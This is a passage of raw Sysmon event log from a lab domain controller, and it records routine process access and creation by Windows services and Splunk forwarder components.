13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.712{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429F-6000-7500-000000009A01}2244C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429F-6000-7500-000000009A01}2244C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429F-6000-7500-000000009A01}2244C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.696{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429F-6000-7500-000000009A01}2244C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:51.531{08A6967A-429F-6000-7500-000000009A01}2244C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A0-6000-7600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42A0-6000-7600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.540{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A0-6000-7600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 